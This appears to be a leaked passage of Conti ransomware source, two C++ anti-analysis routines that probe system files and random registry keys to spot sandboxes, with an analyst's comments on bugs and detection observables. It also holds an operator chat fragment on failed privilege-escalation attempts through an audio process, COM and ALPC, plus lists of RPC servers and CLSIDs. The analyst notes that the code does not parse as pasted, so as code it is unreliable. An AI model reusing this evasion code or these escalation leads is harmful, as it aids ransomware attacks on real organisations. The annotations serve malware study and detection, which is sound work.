Conti.Functions()
/*
 * GetRandomBuf - builds a heap buffer of NUL-free "noise" bytes taken from
 * the contents of a file that lives in the Windows system directory.
 *
 * Analyst note: this is a leaked snippet transcribed with losses. As pasted,
 * the StringCchCopyA call inside the loop and the StringCchCatA call that
 * appends the path separator do not parse; everything below is read from
 * the visible text, not from a build.
 *
 * What the visible code does:
 *   - enumerates the system directory (GetSystemDirectoryA + "\*"),
 *   - records the names of up to 5000 non-directory entries whose low
 *     32-bit size exceeds fileSize (150000 bytes),
 *   - opens the entry at index randomNum % count (randomNum is hard-coded
 *     to 8 despite the "random" comment), reads `size` bytes of it,
 *   - rewrites every zero byte to a non-zero value, restarting the scan
 *     from the top after each rewrite, then forces buf[fileSize - 1] = 0.
 *
 * Returns: a new[]-allocated char buffer; ownership passes to the caller.
 *   It is a C string of length fileSize - 1 only if the chosen file was at
 *   least fileSize bytes long: the zero-fixing loop is bounded by fileSize,
 *   not by the actual allocation `size`.
 *
 * Resource handling observed: the FindFirstFileA, CreateFileA, GetFileSize
 * and ReadFile results are not checked, the 5000 name buffers are never
 * released, and the handle close is commented out.
 *
 * Detection-relevant observables: a directory listing of the system
 * directory via FindFirstFileA/FindNextFileA followed by a full read of one
 * large file from it.
 */
char* GetRandomBuf()
{
char tempFileName[MAX_PATH];
char targetFileName[MAX_PATH];
// random
// Fixed selector; only reduced modulo `count` below.
size_t randomNum = 8;
WIN32_FIND_DATAA ffd;
DWORD size = 0;
GetSystemDirectoryA((LPSTR)tempFileName, (UINT)MAX_PATH);
GetSystemDirectoryA((LPSTR)targetFileName, (UINT)MAX_PATH);
// Search pattern "<sysdir>\*"; the result of FindFirstFileA is not checked.
StringCchCatA(tempFileName, MAX_PATH, "\\\*");
HANDLE f = FindFirstFileA(tempFileName, &ffd);
size_t count = 0;
// 5000 name slots of MAX_PATH bytes each; never freed (see the commented-out
// delete[] at the end, which would only free the outer array anyway).
char** fileNamesArr = new char*[5000];
DWORD rbRead;
for (size_t i = 0; i < 5000; ++i)
fileNamesArr[i] = new char[MAX_PATH];
// set randomly
// Minimum size of a candidate file and the length the returned buffer is
// assumed to have.
size_t fileSize = 150000;
do
{
if (!(ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
{
// Only the low 32 bits of the size are compared.
if (ffd.nFileSizeLow > fileSize)
{
// a/b are dead locals: a is written and never read afterwards.
int a = 1;
int b = 2;
StringCchCopyA(fileNamesArr[count], MAX_PATH, ffd.cFileName;)
++count;
a += b + count;
}
}
} while (FindNextFileA(f, &ffd) && count < 5000);
FindClose((HANDLE)f);
// Division by zero here if no candidate file was found (count == 0).
randomNum %= count;
StringCchCatA(targetFileName, MAX_PATH, "\\\");
StringCchCatA(targetFileName, MAX_PATH, fileNamesArr[randomNum]);
// Opened with share mode 0 and no error check; INVALID_HANDLE_VALUE would
// flow into GetFileSize/ReadFile unchanged.
HANDLE hFile = CreateFileA(targetFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
size = (DWORD)GetFileSize((HANDLE)hFile, nullptr);
char* buf = new char[size];
ReadFile((HANDLE)hFile, buf, size, &rbRead, nullptr);
// Replace every zero byte with a non-zero derived value so the buffer can be
// treated as a C string. After each replacement `i = 0` restarts the scan
// (the ++i then resumes at index 1). Bounded by fileSize, not `size`.
for (DWORD i = 0; i < fileSize; ++i)
{
if (buf[i] == 0)
{
size_t z = i;
size_t t = i * 32;
size_t y = i * 123 - 44 + i;
// z is in 0..254; the else branch guarantees a non-zero result.
z = t * y % 255;
if (z != 0)
buf[i] = z;
else
buf[i] = z + 23;
i = 0;
}
}
/*delete[] fileNamesArr;
pCloseHandle(hFile);
*/
// Terminator; out of bounds if the file (and so `size`) is smaller than fileSize.
buf[fileSize - 1] = 0;
return buf;
}
[24.09.21 15:37:40] orval: ``
/*
 * QueryReg - probes HKEY_CURRENT_USER with subkey names sliced out of `buf`
 * and reports whether more than 10 probes ended in "key opened but the
 * value query failed".
 *
 * Parameters:
 *   buf       - NUL-terminated byte string (GetRandomBuf above produces one
 *               with no interior zeros). 11-byte windows at offsets
 *               0, 40, 80, ... are used as subkey names.
 *   startTime - a GetTickCount() reading supplied by the caller; the loop
 *               gives up once 20 seconds of wall time have passed.
 *
 * Returns: true when the counter exceeds 10.
 *
 * NOTE(review): the meaning of the threshold is not stated on this page; it
 * reads like a runtime-environment consistency check (on an ordinary system
 * random 11-character subkeys under HKCU should not open) — confirm against
 * the caller before relying on that reading.
 *
 * Observations from the visible code:
 *   - hKey is never initialised and is tested whenever RegOpenKeyExA fails
 *     with anything other than ERROR_FILE_NOT_FOUND, so that branch reads an
 *     indeterminate value; an opened key is never closed.
 *   - temp is obtained from MyHeapAlloc but released with free(); whether the
 *     two match is not visible here.
 *   - StrLen(buf) - 18 is size_t arithmetic and wraps for inputs shorter
 *     than 18 bytes, turning the loop bound into a huge value.
 *   - parameterName / parameterValue are fixed literals despite the
 *     "do random" comments, and parameterValue (a string literal) is handed
 *     to RegQueryValueExA as a 12-byte output buffer.
 *   - StrLen, MyHeapAlloc and m_memcpy are project helpers not shown here.
 */
bool QueryReg(char* buf, DWORD startTime)
{
size_t result = 0;
LSTATUS errCode = 0;
// Indeterminate until RegOpenKeyExA succeeds; read on the failure path too.
HKEY hKey;
size_t step = 0;
//do random
char* parameterName = (char*) "zsadsgjea";
//do random
char* parameterValue = (char*) "svogfiifotuz";
DWORD dataSize = 12;
while (step < StrLen(buf) - 18)
{
// 11 bytes of buf + terminator, used as the subkey name for this probe.
char* temp = (char*)MyHeapAlloc(12);// new char[12];
temp[11] = 0;
m_memcpy(temp, buf + step, 11);
errCode = (LSTATUS)RegOpenKeyExA((HKEY)HKEY_CURRENT_USER, temp, (DWORD)0, (REGSAM)KEY_READ, &hKey);
// Counted only when the open did not report "not found" AND the value query
// then fails; a plain not-found on a real system is ignored.
if (errCode != ERROR_FILE_NOT_FOUND && hKey)
{
errCode = (LSTATUS)RegQueryValueExA(hKey, (LPCSTR)parameterName, nullptr, nullptr, (LPBYTE)parameterValue, &dataSize);
if (errCode != ERROR_SUCCESS && hKey)
++result;
}
//step += 18;
// Stride of 40 bytes between consecutive 11-byte windows.
step += 40;
free(temp);
// Wall-clock cap: stop after 20 seconds since startTime.
if ((DWORD)GetTickCount() - startTime > 1000 * 20)
break;
}
return result > 10;
}

Negative result by audio so far

  1. injections into the process with higher primes do not work (via COM too)
  2. between the audio process and COM no interaction via LPC/ALPC/PIPE etc., that is, the operation of "server" in this case is not possible, plus ALPC is filtered by SID
  3. there is no sense to load RPC in your process because we have a bent user
    In particular, here are all the RPC servers on the test machine
    [+] Exe starting RPC Server: C:\Windows\System32\AppVShNotify.exe
    [+] Exe starting RPC Server: C:\Windows\System32\BioIso.exe
    [+] Exe starting RPC Server: C:\Windows\System32\ByteCodeGenerator.exe
    [+] Exe starting RPC Server: C:\Windows\System32\FsIso.exe
    [+] Exe starting RPC Server: C:\Windows\System32\FXSSVC.exe
    [+] Exe starting RPC Server: C:\Windows\System32\LsaIso.exe
    [+] Exe starting RPC Server: C:\Windows\System32\lsass.exe
    [+] Exe starting RPC Server: C:\Windows\System32\mpnotify.exe
    [+] Exe starting RPC Server: C:\Windows\System32\NetEvtFwdr.exe
    [+] Exe starting RPC Server: C:\Windows\System32\NgcIso.exe
    [+] Exe starting RPC Server: C:\Windows\System32\rdpclip.exe
    [+] Exe starting RPC Server: C:\Windows\System32\rdpinit.exe
    [+] Exe starting RPC Server: C:\Windows\System32\rdpshell.exe
    [+] Exe starting RPC Server: C:\Windows\System32\services.exe
    [+] Exe starting RPC Server: C:\Windows\System32\SgrmLpac.exe
    [+] Exe starting RPC Server: C:\Windows\System32\svchost.exe
    [+] Exe starting RPC Server: C:\Windows\System32\TCPSVCS.EXE
    [+] Exe starting RPC Server: C:\Windows\System32\WaaSMedicAgent.exe
    [+] Exe starting RPC Server: C:\Windows\System32\wimserv.exe
    [+] Exe starting RPC Server: C:\Windows\System32\wininit.exe
    [+] Exe starting RPC Server: C:\Windows\System32\winlogon.exe
    [+] Exe starting RPC Server: C:\Windows\System32\wlanext.exe
    [+] Exe starting RPC Server: C:\Windows\System32\IME\IMJP\IMJPDCT.EXE


HKEY_CLASSES_ROOT\CLSID\{27F71832-6815-48CB-902A-7A1D891BA962} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{294935CE-F637-4E7C-A41B-AB255460B862} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{41FCCC3A-1FA1-4949-953A-6EE61C46A4D1} Microsoft.Audio.AudioClient Binder - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{444F7305-1D7D-4BE9-8C29-CC3F1D220C40} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{562462DD-4F9A-4110-9D6A-C3CA0407FF76} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{69A95A38-C637-46A0-9FB2-1C939AEBF2E8} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{6EC153C1-371E-47E1-A896-2F7F80EB7842} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{73843B93-848F-453B-953D-2E5B911429DC} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{870AF99C-171D-4f9e-AF0D-E63DF40C2BC9} - 9 cmd
HKEY_CLASSES_ROOT\CLSID\{8D9945C3-A621-4F52-8641-6D8B755F42E2} - 12 cmd system blocked
HKEY_CLASSES_ROOT\CLSID\{ede7f087-890f-491c-b906-9abb31896960} CLSID_EuVolumeNotificationCallback - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10} psfactorybuffer - 2 cmd
